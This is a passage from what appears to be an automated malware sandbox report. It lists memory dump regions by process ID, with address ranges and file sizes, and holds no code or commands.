                                                                                      • memory/2936-198-0x000001EBF4410000-0x000001EBF4481000-memory.dmp
                                                                                        Filesize

                                                                                        452KB

                                                                                      • memory/2976-147-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/2976-134-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                        Filesize

                                                                                        1.1MB

                                                                                      • memory/2976-143-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/2976-131-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                        Filesize

                                                                                        572KB

                                                                                      • memory/2976-145-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/2976-141-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/2976-133-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                        Filesize

                                                                                        152KB

                                                                                      • memory/2976-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                        Filesize

                                                                                        1.5MB

                                                                                      • memory/2976-117-0x0000000000000000-mapping.dmp
                                                                                      • memory/3024-146-0x0000000000000000-mapping.dmp
                                                                                      • memory/3052-228-0x00000000012E0000-0x00000000012F5000-memory.dmp
                                                                                        Filesize

                                                                                        84KB

                                                                                      • memory/3064-167-0x0000000000000000-mapping.dmp
                                                                                      • memory/3236-402-0x0000000000000000-mapping.dmp
                                                                                      • memory/3740-150-0x0000000000000000-mapping.dmp
                                                                                      • memory/3816-310-0x000001A80AE80000-0x000001A80AECC000-memory.dmp
                                                                                        Filesize

                                                                                        304KB

                                                                                      • memory/3816-195-0x000001A80AEF0000-0x000001A80AF61000-memory.dmp
                                                                                        Filesize

                                                                                        452KB

                                                                                      • memory/3816-316-0x000001A80B100000-0x000001A80B171000-memory.dmp
                                                                                        Filesize

                                                                                        452KB

                                                                                      • memory/3816-193-0x000001A80AE30000-0x000001A80AE7C000-memory.dmp
                                                                                        Filesize

                                                                                        304KB

                                                                                      • memory/3852-144-0x0000000000000000-mapping.dmp
                                                                                      • memory/3928-379-0x0000000002A20000-0x0000000002A21000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3928-393-0x000000001B580000-0x000000001B582000-memory.dmp
                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/3928-367-0x0000000000000000-mapping.dmp
                                                                                      • memory/3928-383-0x0000000002A30000-0x0000000002A4C000-memory.dmp
                                                                                        Filesize

                                                                                        112KB

                                                                                      • memory/3928-370-0x0000000000A50000-0x0000000000A51000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/3992-166-0x000000001BC00000-0x000000001BC02000-memory.dmp
                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/3992-153-0x0000000000000000-mapping.dmp
                                                                                      • memory/3992-164-0x0000000000FC0000-0x0000000000FC1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4008-403-0x000000001AB00000-0x000000001AB02000-memory.dmp
                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/4008-384-0x0000000000940000-0x000000000095C000-memory.dmp
                                                                                        Filesize

                                                                                        112KB

                                                                                      • memory/4008-377-0x00000000004A0000-0x00000000004A1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4008-368-0x0000000000060000-0x0000000000061000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4008-364-0x0000000000000000-mapping.dmp
                                                                                      • memory/4020-152-0x0000000000000000-mapping.dmp
                                                                                      • memory/4020-179-0x0000000000400000-0x00000000008F2000-memory.dmp
                                                                                        Filesize

                                                                                        4.9MB

                                                                                      • memory/4020-178-0x0000000000900000-0x0000000000A4A000-memory.dmp
                                                                                        Filesize

                                                                                        1.3MB

                                                                                      • memory/4084-288-0x000001A0131D0000-0x000001A0131EB000-memory.dmp
                                                                                        Filesize

                                                                                        108KB

                                                                                      • memory/4084-289-0x000001A014100000-0x000001A014206000-memory.dmp
                                                                                        Filesize

                                                                                        1.0MB

                                                                                      • memory/4084-183-0x00007FF708674060-mapping.dmp
                                                                                      • memory/4084-201-0x000001A011880000-0x000001A0118F1000-memory.dmp
                                                                                        Filesize

                                                                                        452KB

                                                                                      • memory/4104-261-0x0000000000000000-mapping.dmp
                                                                                      • memory/4104-366-0x0000000000400000-0x00000000009BE000-memory.dmp
                                                                                        Filesize

                                                                                        5.7MB

                                                                                      • memory/4104-363-0x00000000001D0000-0x00000000001FE000-memory.dmp
                                                                                        Filesize

                                                                                        184KB

                                                                                      • memory/4116-285-0x00000000055F0000-0x00000000055F1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4116-270-0x0000000005430000-0x0000000005431000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4116-406-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                        Filesize

                                                                                        644KB

                                                                                      • memory/4116-404-0x000000000046B76D-mapping.dmp
                                                                                      • memory/4116-257-0x0000000000C10000-0x0000000000C11000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4116-246-0x0000000000000000-mapping.dmp
                                                                                      • memory/4116-281-0x00000000053E0000-0x00000000053E1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4152-319-0x0000000000000000-mapping.dmp
                                                                                      • memory/4164-248-0x0000000000000000-mapping.dmp
                                                                                      • memory/4164-405-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                        Filesize

                                                                                        644KB

                                                                                      • memory/4164-401-0x000000000046B76D-mapping.dmp
                                                                                      • memory/4256-253-0x0000000000400000-0x00000000004E4000-memory.dmp
                                                                                        Filesize

                                                                                        912KB

                                                                                      • memory/4256-250-0x0000000000000000-mapping.dmp
                                                                                      • memory/4340-417-0x0000000000000000-mapping.dmp
                                                                                      • memory/4372-308-0x0000000000E10000-0x0000000000E11000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4372-335-0x0000000005850000-0x0000000005851000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4372-301-0x0000000000000000-mapping.dmp
                                                                                      • memory/4432-278-0x000001A8033C0000-0x000001A8033C1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4432-275-0x0000000000000000-mapping.dmp
                                                                                      • memory/4444-264-0x0000000000000000-mapping.dmp
                                                                                      • memory/4476-265-0x0000000000000000-mapping.dmp
                                                                                      • memory/4548-420-0x0000000005570000-0x00000000055E6000-memory.dmp
                                                                                        Filesize

                                                                                        472KB

                                                                                      • memory/4548-413-0x0000000000000000-mapping.dmp
                                                                                      • memory/4644-430-0x0000000000000000-mapping.dmp
                                                                                      • memory/4656-231-0x0000000000000000-mapping.dmp
                                                                                      • memory/4828-241-0x0000000000B20000-0x0000000000B21000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4828-235-0x0000000000000000-mapping.dmp
                                                                                      • memory/4848-237-0x0000000000000000-mapping.dmp
                                                                                      • memory/4864-409-0x0000000000000000-mapping.dmp
                                                                                      • memory/4904-239-0x0000000000000000-mapping.dmp
                                                                                      • memory/4956-391-0x00000000054A0000-0x00000000054A1000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4956-240-0x0000000000000000-mapping.dmp
                                                                                      • memory/4956-361-0x0000000000000000-mapping.dmp
                                                                                      • memory/4956-374-0x0000000000B10000-0x0000000000B11000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4964-411-0x0000000000000000-mapping.dmp
                                                                                      • memory/4972-324-0x0000000000000000-mapping.dmp
                                                                                      • memory/4980-295-0x0000000000000000-mapping.dmp
                                                                                      • memory/4980-300-0x0000000004CA9000-0x0000000004DAA000-memory.dmp
                                                                                        Filesize

                                                                                        1.0MB

                                                                                      • memory/4980-305-0x0000000004DB0000-0x0000000004E0D000-memory.dmp
                                                                                        Filesize

                                                                                        372KB

                                                                                      • memory/4992-296-0x0000000000000000-mapping.dmp
                                                                                      • memory/4992-339-0x0000000005690000-0x0000000005691000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/4992-322-0x0000000000D40000-0x0000000000D41000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/5004-421-0x0000000000000000-mapping.dmp
                                                                                      • memory/5012-407-0x0000000005390000-0x0000000005996000-memory.dmp
                                                                                        Filesize

                                                                                        6.0MB

                                                                                      • memory/5012-382-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                        Filesize

                                                                                        120KB

                                                                                      • memory/5012-386-0x0000000000417DEA-mapping.dmp
                                                                                      • memory/5016-412-0x0000000000000000-mapping.dmp
                                                                                      • memory/5028-298-0x0000000000000000-mapping.dmp
                                                                                      • memory/5032-365-0x0000000000000000-mapping.dmp
                                                                                      • memory/5052-307-0x0000000000160000-0x0000000000161000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/5052-299-0x0000000000000000-mapping.dmp
                                                                                      • memory/5052-380-0x0000000004B20000-0x0000000004B21000-memory.dmp
                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/5096-243-0x0000000000000000-mapping.dmp